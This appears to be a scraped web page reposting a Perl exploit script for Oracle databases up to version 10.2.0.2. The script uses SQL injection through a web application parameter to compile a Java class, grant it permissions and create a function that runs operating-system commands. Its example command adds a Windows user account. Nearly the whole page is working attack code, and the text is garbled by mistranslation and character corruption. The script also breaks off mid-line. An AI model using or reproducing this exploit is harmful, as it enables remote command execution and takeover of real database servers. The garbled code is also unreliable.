Run system commands through Oracle Injection

Source: Internet
Author: User

Baishen blog

Two articles about this:

 

Http://www.bkjia.com/Article/200810/30019.html


Http://www.red-database-security... nds_via_webapp.html

 


CODE:

#! /Usr/bin/env perl
Use LWP: Simple;

Print "-----------------------------------------------------------------------";
Print "Oracle command execution via web apps ";
Print "sid-at-NotSoSecure // www.notsosecure.com ";
Print "suported versions <= 10.2.0.2, all platforms ";
Print "------------------------------------------------------------------------";

If (@ ARGV <2)
{
Print "Usage :";
Print "ora_cmd_exec.pl <URL> <cmd-to-exec> ";
Print "";
Print "EXAMPLE:./ora_rj_exec.pl" http: // 192.168.172.129: 81/ora3.php? Name = s "" net user notsosecure n0tsos3cur3/add "";
Print "EXAMPLE:./ora_rj_exec.pl" http: // 192.168.172.129: 81/ora3.php? Id = 100 "" net user notsosecure n0tsos3cur3/add "";
Print "------------------------------------------------------------------------";

Exit ();
}

My $ url_1 = $ ARGV [0]. "and 1 = ";
My $ javalib = "(select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT". PUT (: P1); EXECUTE IMMEDIATE
Declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace and compile java source named
"LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args)
{Try {BufferedReader myReader = new BufferedReader (new InputStreamReader (runtime.getruntime(.exe c (args). getInputStream ()
); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str % 2b = stemp % 2b "\ n"; myReader. close (); return
Str;} catch (Exception e) {return e. toString () ;}} public static String readFile (String filename) {try {BufferedReader
MyReader = new BufferedReader (new FileReader (filename); String stemp, str = ""; while (stemp = myReader. readLine ())! =
Null) str % 2b = stemp % 2b "\ n"; myReader. close (); return str;} catch (Exception e) {return
E. toString () ;}}; END; --, SYS, 0) from dual )--";

My $ javaperm = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate begin dbms_java.grant_permission (
PUBLIC, SYS: java. io. FilePermission, <>, execute); end; END; --, SYS, 0, 1) from dual )--";

My $ export _exec_func = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace function
LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name LinxUtil. runCMD (java. lang. string) return String; END; --, SYS, 0, 1) from dual )--";

My $ export _exec_func_priv = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant all on LinxRunCMD
To public; END; --, SYS, 0, 0) from dual )--";

My $1__1 = $ ARGV [1];
My $ cmd_exec = "(select sys.LinxRunCMD(cmd.exe/c". $ cmd_1. ") from dual )--";

Print "Step 1. Creating Java Library ...";
Print "--------------------------------";
My $ url = $ url_1. $ javalib;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;


If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 1 occured !!!... Did you provide me the URL in the format, I want ?? ";
Print "-----------------------------------------------";
} Else {
Print "NO errors encountered... proceeding to step... 2 ";
Print "--------------------------------";

# Print $ content;
}

#-----------------------
Print "Step 2. granting java execute privileges ...";
My $ url = $ url_1. $ javaperm;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;


If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 2 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 3 ";
Print "--------------------------------";

# Print $ content;
}

#-----------------------
Print "Step 3. creating funtion for command execution ...";
My $ url = $ url_1. $ pai_exec_func;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;


If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 3 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 4 ";
Print "--------------------------------";

# Print $ content;
}

#-----------------------
Print "Step 4. making function executable by all users ...";
My $ url = $ url_1. $ pai_exec_func_priv;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;


If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 4 occured !!!... Something was not right ..";
Print "-----------------------------------------------";
Print "I will proceed, however, there is a possibility that the attack will fail ";
} Else {
Print "NO errors encountered... proceeding to step... 5 ";
Print "--------------------------------";

# Print $ content;
}

#-----------------------
Print "Step 5. RIGHT !!!, By now we shoshould have a function sys. LinxRunCMD through which we can execute commands ...";
Print "--------------------------------";
Print "You shoshould be able to execute this function as: select sys.linxrun.pdf (.exe/c net user notsosecure n0ts3cur3/add) from dual ";
Print "I will execute the command you told me to execute... you wont be able to see the output though :(";
My $ url = $ url_1. $ pai_exec;
My $ content = get $ url;
Die "Couldnt get $ url" unless defined $ content;


If ($ content = ~ M/warning/I ){
Print "-----------------------------------------------";
Print "ERROR at STAGE 5 occured !!!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.